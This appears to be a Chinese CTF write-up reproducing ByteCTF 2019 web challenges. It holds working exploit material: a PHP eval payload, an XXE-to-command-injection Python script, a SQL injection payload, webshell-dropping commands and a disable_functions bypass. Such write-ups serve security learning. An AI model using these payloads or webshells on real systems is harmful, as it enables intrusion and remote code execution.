bytectf 2019 web题复现

bring_code

环境

https://github.com/glzjin/bytectf_2019_boring_code

解题

访问http://127.0.0.1:8302/code/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
function is_valid_url($url) {
if (filter_var($url, FILTER_VALIDATE_URL)) {
if (preg_match('/data:\/\//i', $url)) {
return false;
}
return true;
}
return false;
}

if (isset($_POST['url'])){
$url = $_POST['url'];
if (is_valid_url($url)) {
$r = parse_url($url);
if (preg_match('/baidu\.com$/', $r['host'])) {
$code = file_get_contents($url);
if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
echo 'bye~';
} else {
eval($code);
}
}
} else {
echo "error: host not allowed";
}
} else {
echo "error: invalid url";
}
}else{
highlight_file(__FILE__);
}

第一部分看了好几只队伍的wp好像都是氪金过的..
主要看第二部分无参数代码执行
参考https://xz.aliyun.com/t/6316
总结一下就是有无参数的获得字符串.
看到最好用的是

最终的payload
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

rss

环境

暂无

解题

可以把rss解析,
可用data://绕baidu域名
利用xxe获得题目源码
在views/Admin.php里发现

1
usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));

参考https://www.cnblogs.com/-qing-/p/10816089.html
exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# -*- coding: utf-8 -*-  
import base64
import requests
cmd = "cat+%2Fflag_eb8ba2eb07702e69963a7d6ab8669134"
xml = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://127.0.0.1/rss_in_order/?order=link%2C%24b-%3Elink%29%3B%7Dsystem%28%27"""+cmd+"""%27%29%3B%2F%2F&rss_url=http://www.asdfghjklbaidu.com/a.xml" >]>
<rss version="2.0"
xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>xz</title>
<link>http://xz.aliyun.com/forum/</link>
<description>xz</description>
<atom:link href="http://xz.aliyun.com/forum/feed/" rel="self"></atom:link>
<language>zh-hans</language>
<lastBuildDate>Tue, 02 Jul 2019 06:03:00 +0800</lastBuildDate>
<item>
<title>123</title>
<link>http://xz.aliyun.com/t/5310</link>
<description>&xxe;</description>
<pubDate>Mon, 03 Jun 2019 09:09:00 +0800</pubDate>
<guid>http://xz.aliyun.com/t/5310</guid>
</item>
</channel>
</rss>"""
b64_xml = base64.b64encode(xml.encode('utf-8'))
r = requests.post("http://112.126.96.50:9999/fetch",data={"rss_url":"data://text.baidu.com/plain;base64,"+b64_xml})
#print r.text
b64_r = r.text.split('<p>')[3].split('</p>')[0].strip()
test = base64.b64decode(b64_r)
print test

babyblog

环境

https://github.com/glzjin/bytectf_2019_babyblog

解题

访问www.zip获取源码
在edit.php下存在二次注入

1
2
3
4
5
6
if($_SESSION['id'] == $row['userid']){
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql->query("update article set title='$title',content='$content' where title='" . $row['title'] . "';");
exit("<script>alert('Edited successfully.');location.href='index.php';</script>");
}

payload

1
1'^(ascii(substr((select(group_concat(schema_name)) from (information_schema.schemata)),1,1))>1)^'1

布尔注入,当无法修改标题时结束
注入代码可以参考https://xz.aliyun.com/t/6324
注出权限账号
原题中应该有isvip为1的,环境中没给出.请自行修改
拿到权限后就可以访问replace.php
$content = addslashes(preg_replace("/" . $_POST['find'] . "/", $_POST['replace'], $row['content']));
由于是php5.3可以用%00截断,可以preg_replace利用命令执行
https://xz.aliyun.com/t/2557
发现有disable_function存在,而且执行代码时会代空某些函数
先上传一个马

1
2
command = """eval("file_put_contents('1.php','PD9waHAgZXZhbCgkX1BPU1RbJ2FudCddKTs=');")"""
command = """eval("file_put_contents('2.php','<?php include(\\\'php://filter/convert.base64-decode/resource=1.php\\\');');")"""

然后就可以在2.php代码执行
参考
https://github.com/l3m0n/Bypass_Disable_functions_Shell/tree/master/exp/LD_PRELOAD
注意mail被过滤
最后一句替换成
error_log("",1,"someone@example.com","");即可bypass

EZCMS

环境

https://github.com/glzjin/bytectf_2019_ezcms

解题

www.zip拿到源码
哈希扩展攻击
上传phar文件,配合反序列化扩展攻击面
选择ZipArchive 类,利用其open函数,移除掉.htaccess
看参考

icloudmusic

又是一道webpwn,占坑

dot_server_prove

https://xz.aliyun.com/t/6312

参考

https://xz.aliyun.com/t/6324
https://xz.aliyun.com/t/6305